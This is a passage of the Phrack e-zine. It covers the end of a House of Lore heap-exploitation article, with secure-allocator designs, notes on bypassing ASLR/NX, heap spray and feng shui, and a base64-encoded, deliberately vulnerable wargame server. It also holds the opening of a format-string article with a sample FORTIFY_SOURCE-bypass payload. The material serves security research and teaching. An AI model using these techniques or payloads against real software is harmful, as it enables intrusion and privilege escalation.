   size_t rsize = (g)m->topsize // gm for dlmalloc( ), m for 
                                // mspace_malloc( )


In any case, it is worth recalling one of the comments present at the 
beginning of "malloc.c":

     "This is only one aspect of security -- these checks do not,
      and cannot, detect all possible programming errors".



               << Programming without an overall architecture
                  or design in mind is like exploring a cave
                  with only a flashlight: You don't know where
                  you've been, you don't know where you're going,
                  and you don't know quite where you are. >>

                                                 [ Danny Thorpe ]



               .-----------------------------------.
---[ 4.3.1 ---[   Secure Heap Allocator (Utopian)   ]---
               .-----------------------------------.

First, there is no way to create a "heap allocator" totally secure, it's
impossible (note: you can design the most secure allocator in the world but
if it's too slow => it's no use). To begin with, and the main rule (which
is fairly obvious), implies that the control structures or more simply,
headers, can not be located being adjacent to the data. Create a macro that
adds 8 bytes to the address of a header for direct access to data is very
simple, but has never been a safe option.

However, although this problem will be solved, still others thought to
corrupt the data of another allocated chunk is not useful if it not allows
arbitrary code execution, but and if these buffers contain data whose
integrity has to be guaranteed (financial information, others...)?

Then we came to the point in which it is essential the use cookies between 
the fragments of memory assigned. It obviously has side effects. The most
efficient would be that this cookie (say 4 bytes) will be the last 4 bytes
of each allocated chunk, with the target of preserve the alignment, since
that put them between two  chunks required a more complicated and possibly
slower management.

Besides this, we could also take ideas from "Electric Fence - Red-Zone
memory allocator" by Bruce Perens [5]. His protection ideas are:


   - Anti Double Frees:

	if ( slot->mode != ALLOCATED ) {
 		if ( internalUse && slot->mode == INTERNAL_USE )
			.....
		else {
			EF_Abort("free(%a): freeing free memory.",address);

   - Free unallocated space (EFense maintains an array of addresses
     of chunks allocated (slots) ):

	slot = slotForUserAddress(address);
	if ( !slot )
		EF_Abort("free(%a): address not from malloc().", address);


Other implementations of dynamic memory management that we should take into
account: Jemalloc on FreeBSD [6] and Guard Malloc for Mac OS X [7].

The first is specially designed for concurrent systems. We talked about
management of multiple threads on multiple processors, and how to achieve 
this efficiently, without affecting system performance, and getting better 
times in comparison with other memory managers.

The second, to take one example, use the pagination and its mechanism of
protection in a very clever way. Extracted directly from the manpage, we 
read the core of his method:

   "Each malloc allocation is placed on its own virtual memory page, with 
    the end of the buffer at the end of the page's memory, and the next 
    page is kept unallocated. As a result, accesses beyond the end of the 
    buffer cause a bus error immediately. When memory is freed, libgmalloc 
    deallocates its virtual memory, causing reads or writes to the freed 
    buffer cause a bus error."

Note: That's a really interesting idea but you should take into account the
fact that such a technic is not _that_ effective because if would sacrifice
a lot of memory. It would induce a PAGE_SIZE (4096 bytes is a common value,
or getpagesize( ) ;) allocation for a small chunk.

In my opinion, I do not see Guard Malloc as a memory manager of routine 
use, but rather as an implementation with which to compile your programs in
the early stages of development/debugging.

However, Guard Malloc is a highly user-configurable library. For example,
you could allow through an specific environment variable 
(MALLOC_ALLOW_READS) to read past an allocated buffer. This is done by 
setting the following virtual page as Read-Only. If this variable is 
enabled along with other specific environment variable 
(MALLOC_PROTECT_BEFORE), you can read the previous virtual page. And still 
more, if MALLOC_PROTECT_BEFORE is enabled without MALLOC_ALLOW_READS buffer
underflow can be detected. But this is something that you can read in the 
official documentation, and it's needless to say more here.



               << When debugging, novices insert corrective
                  code; experts remove defective code. >>

                                         [ Richard Pattis ]



               .------------.
---[ 4.3.2 ---[   dnmalloc   ]---
               .------------.

This implementation (DistriNet malloc) [10] is like the most modern 
systems: code and data are loaded into separate memory locations, dnmalloc 
applies the same to chunk and chunk information which are stored in 
separate contiguous memory protected by guard pages. A hashtable which 
contains pointers to a linked list of chunk information accessed through 
the hash function is used to associate chunks with the chunks information.
[12]

Memory with dnmalloc:

        .---------------.
        |  .text        |
        .---------------.
        |  .data        |
        .---------------.
           ...        
        .---------------.
        |  Chunks        |
        .---------------.
            ..
            ||
            ||  
            \/
        
            /\
            || 
            ||
            ..
        .--------------------.
        |  Memory Page       | <- This Page is not writable
        .--------------------. 
        |  Chunk Information |
        .--------------------.
        |  The Hash Table    |
        .--------------------. 
        |  Memory Page       | 
        .--------------------. 
        |  The Stack         | <- This Page is not writable
        .--------------------.

The way to find the chunk information:

1.- Address of the chunk - Start address of the heap = *Result*

2.- To get the entry in the Hash Table: shift *Result* 7 bits to the right.

3.- Go over the linked list till it have the correct chunk.

 .-------------------------------------.
 |           The Hash Table            |
 . ................................... . 
 |  Pointers to each Chunk Information | --> Chunk Information (Hash Next 
 .-------------------------------------.     to the next Chunk Information)

The manipulation of the Chunk Information:

1.- A fixed area is mapped below the Hash table for the Chunks Information.

2.- Free Chunk Information are stored in a linked list.

3.- When a new Chunk Information is needed the first element in the free 
    list is used.

4.- If none are free a Chunk is allocated from the map.

5.- If the map is empty It maps extra memory for it (and move the guard 
    page).

6.- Chunk information is protected by guard pages.



               << Passwords are like underwear: you don't let
                  people see it, you should change it very often,
                  and you shouldn't share it with strangers. >>

                                                [ Chris Pirillo ] 



               .------------------.
---[ 4.3.3 ---[   OpenBSD malloc   ]---
               .------------------.

This implementation [11] [13] have the design goals: simple, unpredictable,
fast, less metadata space overhead, robust for example freeing of a bogus 
pointer or a double free should be detected ... 

About the Metadata: keep track of mmaped regions by storing their address 
and size into a hash table, keep existing data structure for chunk 
allocations, a free region cache with a fixed number of slots:

Free regions cache

1.- Regions freed are kept for later reuse

2.- Large regions are unmapped directly

3.- If the number of pages cached gets too large, unmap some.

4.- Randomized search for fitting region, so region reuse is less
    predictable

5.- Optionally, pages in the cache are marked PROT_NONE



               << Getting information off the Internet is
                  like taking a drink from a fire hydrant. >>

                                           [ Mitchell Kapor ]



           .-----------------------------.
---[ 5 ---[   Miscellany, ASLR and More   ]---
           .-----------------------------.

We already mentioned something about ASLR and Non Exec Heap in the Malloc
Des-Maleficarum paper. Now we do the same with the method we have studied.

For the purposes of this technique, I considered disabled the ASLR in all
examples of this article. If this protection was enabled in real life then
randomization only affects to the position of the final fake chunk in the
stack and our ability to predict a memory address close enough to a saved
return address that can be overwritten. This should not be an utterly 
impossible task, and we consider that the bruteforce is always a 
possibility that we will have a hand in most restrictive situations.

Obviously, the non-exec heap does not affect the techniques described in
this paper, as one might place a shellcode in any elsewhere, although we
warn that if the heap is not executable it is very likely that the stack 
will not be either. Therefore one should use a ret2libc style attack or 
return into mprotect( ) to avoid this protection.

This is an old theme, and each will know how to analyze problems underlying
the system attacked.

Unfortunately, I do not show a real-life exploit here. But we can talk a 
bit about the reliability and potential of success when we are studying a
vulnerability in the wild.

The preconditions are clear, this has been seen repeatedly throughout of
this article. The obvious difference between the PoC's that I presented 
here and the applications you use every day (as well as email clients, or
web browsers), is that one can not predict in a first chance the current 
state of the heap. And this is really a problem, because while this is not 
in a fairly stable and predictable state, the chances of exploiting will be
minimal.

But very high-level hackers have already met once this class of problems,
and over time have been designing and developing a series of techniques
which allow reordering the heap so that both, the position of the allocated
chunks as the data contained within them, are parameters controlled by the
user. Among these techniques, we must appoint two best known:

   - Heap Spray
   - Heap Feng Shui

You can read something about them in the following paper presented at the
BlackHat 2007 [8]. In short we can say that the "Heap Spray" technique
simply fill in the heap as far as possible by requesting large amount of
memory placing there repetitions of nop sleds and the opportune shellcode,
then just simply find a predictable memory address for the "primitive 
4-byte overwrite". A very clever idea in this technique is to make the nop 
sled values equal to the selected address, so that it will be 
self-referential.

Feng Shui is a much more elaborate technique, it first tries to defragment 
the Heap by filling the holes. Then it comes back to create holes in the
upper controlled zone so that the memory remains as:

   [ chunk | hole | chunk | hole | chunk | hole | chunk ]

... and finally tries to create the buffer to overflow in one of these 
holes, knowing that this will always be adjacent to one of its buffers 
containing information controlled by the exploiter.

We will not talk about it more here. Just say that although some of these
methodologies may seem time consuming and fatigue making, without them
nobody could create reliable exploits, or obtain success in most of the
attempts.



               << Programming today is a race between software
                  engineers striving to build bigger and better
                  idiot-proof programs, and the Universe trying
                  to produce bigger and better idiots. So far,
                  the Universe is winning. >>

                                                  [ Rich Cook ]



           .---------------.
---[ 6 ---[   Conclusions   ]---
           .---------------.

In this article we have seen how The House of Lore hid inside of itself a
power much greater than we imagined. We also presented a fun example 
showing that, despite not being vulnerable to all the techniques we knew so
far, it was still vulnerable to one that until now had only been described
theoretically.

We detail a second method of attack also based on the corruption of a 
largebin, this attack could be an alternative in some circumstances and 
should be as important as the main method of the smallbin  corruption.

Finally we detailed a way to apply THoL in version 3 of the Ptmalloc 
library, which many thought was not vulnerable to attacks due to the 
imposition of numerous restrictions.

Reviewing and analyzing in depth some of the security mechanisms that have
been implanted in this library, allowed to find that further studies will 
be needed to discover new vulnerabilities and areas of code that can be 
manipulated for personal fun and profit.

If you want a tip from mine on how to improve your hacking, here goes:

Reads everything, study everything... then forget it all and do it 
differently, do it better. Fill your cup, empty your cup and fill it again 
with fresh water.

Finally, I would like to recall that I said the following in my "Malloc
Des-Maleficarum" paper:

     "...and The House of Lore, although not very suitable for a
      credible case, no one can say that is a complete exception..."

With this new article I hope I have changed the meaning of my words, and
shown that sometimes in hacking you make mistakes, but never stop to 
investigate and repair your errors. Everything we do is for fun, and we 
will do it as long as we exist on the land and cyberspace.



               << All truths are easy to understand
                  once they are discovered;
                  the point is to discover them. >>

                                [ Galileo Galilei ]



           .-------------------.
---[ 7 ---[   Acknowledgments   ]---
           .-------------------.

First, I would like to give my acknowledgments to Dreg for his insistence 
for that I would do something with this paper and it not to fall into 
oblivion. After a bad time ... I could not give a talk on this subject at 
RootedCon [9], Dreg still graciously encouraged me to finish the 
translation and publish this article in this fantastic e-zine which 
undoubtedly left its mark etched in the hacking history. 

Indeed, the last details in the translation of this article are Dreg's 
work, and this would never have been what it is without his invaluable 
help.

For the rest, also thanks to all the people I met in dsrCON!, all very 
friendly, outgoing and all with their particular point of madness. I am not
going to give more names, but, to all of them, thanks.

And remember...

Happy Hacking!



           .--------------.
---[ 8 ---[   References   ]---
           .--------------.

[1] Malloc Maleficarum
    http://www.packetstormsecurity.org/papers/attack/MallocMaleficarum.txt

[2] Malloc Des-Maleficarum
    http://www.phrack.org/issues.html?issue=66&id=10

[3] PTMALLOC (v2 & v3)
    http://www.malloc.de/en/

[4] Reducing the effective entropy of gs cookies
    http://uninformed.org/?v=7&a=2&t=sumry

[5] Electric Fence - Red-Zone memory allocator
    http://perens.com/FreeSoftware/ElectricFence/
    electric-fence_2.1.13-0.1.tar.gz

[6] Jemalloc - A Scalable Concurrent malloc(3) Implementacion for FreeBSD
    http://people.freebsd.org/~jasone/jemalloc/bsdcan2006/jemalloc.pdf

[7] Guard Malloc (Enabling the Malloc Debugging Features)
    http://developer.apple.com/mac/library/documentation/Darwin/Reference/
    ManPages/man3/Guard_Malloc.3.html

[8] Heap Feng Shui in JavaScript - BlackHat Europe 2007
    http://www.blackhat.com/presentations/bh-europe-07/Sotirov/
    Presentation/bh-eu-07-sotirov-apr19.pdf

[9] Rooted CON: Congreso de Seguridad Informatica (18-20 Marzo 2010)
    http://www.rootedcon.es/

[10] dnmalloc 
     http://www.fort-knox.org/taxonomy/term/3

[11] OpenBSD malloc
     http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/malloc.c

[12] Dnmaloc - A more secure memory allocator by Yves Younan, 
     Wouter Joosen, Frank Piessens and Hans Van den Eynden
     http://www.orkspace.net/secdocs/Unix/Protection/Description/
     Dnmaloc%20-%20A%20more%20secure%20memory%20allocator.pdf

[13] A new malloc(3) for OpenBSD by Otto Moerbeek
     http://www.tw.openbsd.org/papers/eurobsdcon2009/otto-malloc.pdf



           .----------------.
---[ 9 ---[   Wargame Code   ]---
           .----------------.

In this last section we attach the same program "agents.c" that we saw
above but adapted to network environment so that it can be feasible to use 
in a servers exploitation wargame. At the same time the code is a bit more 
elaborate and robust.

As usual, "netagents.c" forks a child process (fork) for each connection 
made to it, and as each new process has its own heap, each attacker can 
confront the vulnerability based on zero. The actions of one not influence
to others.

The code should be adapted according to the needs of the manager conducting
or developing the wargame (as well as the number of allowed incoming 
connections or debugging information you want to give to the attacker if 
the game becomes very difficult).

The attached archive includes a makefile which assumes that in the same
directory as the source is the compiled library ptmalloc2 (libmalloc.a) to 
be linked with netagents.c. Each should adapt "malloc.c" to print the 
information it deems necessary, but the basics would be the changes that 
have been made throughout this article, which allows the attacker to know
from where they extract the chunks of memory requested.

How the attacker obtains the output of these changes? For simplicity,
"netagents.c" prevents calls to send( ) by closing the standard output 
(stdout) and duplicating it with the recent obtained client socket 
(dup(CustomerID)). We use the same trick as the shellcodes expected.

"netagents.c" also includes a new menu option, "Show Heap State", in order 
to see the state of the memory chunks that are being allocated or released 
during its execution, this allows you to see if the head of any free chunk 
has been overwritten. After some legal moves, a normal output would be 
this:


 +--------------------------------+                                                     
 |    Allocated Chunk (0x8093004) | -> Agents[0]                                        
 +--------------------------------+                                                     
 |   SIZE      =    0x00000019    |                                                     
 +--------------------------------+                                                     

 +--------------------------------+
 |    Allocated Chunk (0x809301c) | -> Agents[1]
 +--------------------------------+             
 |   SIZE      =    0x00000019    |             
 +--------------------------------+             

 +--------------------------------+
 |    Allocated Chunk (0x8093034) | -> Agents[1]->name
 +--------------------------------+                   
 |   SIZE      =    0x00000029    |                   
 +--------------------------------+                   

 +--------------------------------+
 |      Free Chunk (0x8093058)    | -> Agents[1]->lastname
 +--------------------------------+                       
 |   PREV_SIZE  =   0x00000000    |                       
 +--------------------------------+                       
 |   SIZE       =   0x00000089    |                       
 +--------------------------------+                       
 |   FD         =   0x08050168    |                       
 +--------------------------------+                       
 |   BK         =   0x08050168    |
 +--------------------------------+

 +--------------------------------+
 |    Allocated Chunk (0x80930e4) | -> Agents[1]->desc
 +--------------------------------+
 |   SIZE      =    0x00000108    |
 +--------------------------------+


Following the example of the perl exploit presented in 2.2.2, one might 
design an exploit in C with a child process continually receiving responses
from the server (menus and prompts), and the father answering these 
questions with a pause, for example one second each answer (if you know 
what to respond to work that program ...). The difficult task is to predict
the addresses on the stack, which in the last phase of the attack, the last
reserved chunk should match the frame created by "edit_lastname( )" since 
that it is where we overwrite the saved return address and where the 
program probably will break (it is obvious that ASLR enabled suppose a new 
complexity to overcome).

What happens with failed attempts and segmentation failures? The program 
captures SIGSEGV and informs the attacker that something bad has happened 
and encourages him to connect again. The child process is the only that 
becomes unstable and thus a new connection leaves everything clean for a 
new attack.

The latest aid that one could provide to the attacker is to deliver the 
source code, so this could be adapted to study the vulnerability in local, 
and then carry his attack to the network environment.


Attach:

begin-base64 644 thol.zip
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
TOPXtUxQSwUGAAAAAAkACQCdAgAA4w8AAAAA
====

--------[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x43, Phile #0x09 of 0x10

|=-----------------------------------------------------------------------=|
|=-------------------=[ A Eulogy for Format Strings ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=-----------------------=[ by Captain Planet ]=-------------------------=|
|=-----------------------------------------------------------------------=|

Index

------[ 0. Introduction
------[ 1. Glibc's FORTIFY_SOURCE
------[ 2. Bypassing FORTIFY_SOURCE
------[ 3. Exploitation
          A.  Dummy program
          B.  CUPS lppasswd bug
          C.  TODO- ASLR
------[ 4. Afterword


------[ 0. Introduction

Today the Windows CRT disables %n by default [0]. And likewise, glibc's
FORTIFY_SOURCE patches provides protection mechanisms which render 
exploitation impossible. Objective-C isn't being considered, but i'm told 
you can have plenty of fun there too. Even format strings weren't a 
critically endangered species, they've been demoted to the class of 
infoleak. The great thing about format strings of course was that they 
provided both a read and write primitive. They were the `spork` of 
exploitation. ASLR? PIE? NX Stack/Heap? No problem, fmt had you covered.

The story goes that around 2000 everybody was hunting down format strings.
Just about everything was vulnerable. Check out the TESO article in the 
links. It was pretty outrageous. CORE exploited pretty much everything with
locales too [1]. But today, those days are long one. Unless of course 
you're hacking edus, in which case you can still use locale bugs to pop 
root shells on PMOS technology.

A few months ago something funny happened. A guy by the name of Ronald
Volgers [2] had his way with CUPS lppasswd, which was shipped root setuid 
in Ubuntu and Debian. Nice find man! Locale bugs, oh yeah, awesome!

Unfortunately, the aforementioned patch makes fmt str exploitation quite
unlikely.

In detail, the FORTIFY_SOURCE provides two countermeasures against fmt
strings.

  1)   Format strings containing the %n specifier may not be located at a
       writeable address in the memory space of the application.

  2)   When using positional parameters, all arguments within the range 
       must be consumed. So to use %7$x, you must also use 1,2,3,4,5 and 6.

But thats okay since the FORTIFY_SOURCE patch is not really all that 
complete. (-: Why? Because glibc is really really weird code. It amazes me 
that someone would travel all around the world and take credit for glibc 
when they did not even write it. Actually, it makes perfect sense, nobody 
with any dignity would admit to writing any part of glibc to public 
audiences. Don't get me wrong, glibc lets pretty good stuff happen to my 
computer. The code is pretty hard to look at though, you wouldn't introduce
her to your parents if you know what I mean...

What you're about to read is slightly harder than writing a format string
and a little bit easier than building glibc itself. (Glibc binaries are 
ideal for an ELF VX because of the difficulty of compiling them). 
Prequisites are understanding format string exploitation. They were last 
written about in phrack here [3] if you need a refresher. If you have never
exploited a format string vuln, seek the article by 'rebel' [6]. It is one 
of the most skilled and digestible discourses available.

So lets dive right in.

------[ 1. Glibc's FORTIFY_SOURCE

===========================================================================
WARNING: THE REST OF THIS ARTICLE INCLUDES GLIBC CODE WHICH MAY INDUCE 
CHEST PAIN, VOMITING, BLACKOUTS, or PERMANENT LOSS OF EYESIGHT. ALL 
ATTEMPTS TO KEEP KEEP GLIBC CODE TO A MINIMUM HAVE BEEN MADE BY THE AUTHOR.
===========================================================================

"%49150u %4849$hn %1$*269158540$x %1$*13996$x %1073741824$d"

Have you seen a format string like that before? It makes positional 
parameters look less attractive, doesn't it?

So how does this patch supposedly work?

To turn it on the binary must be compiled with `-D_FORTIFY_SOURCE=2` 
enabled with an optimization level of at least -O2. This is likely because 
of the compiler pass the patch is implemented at.

So the following happens.

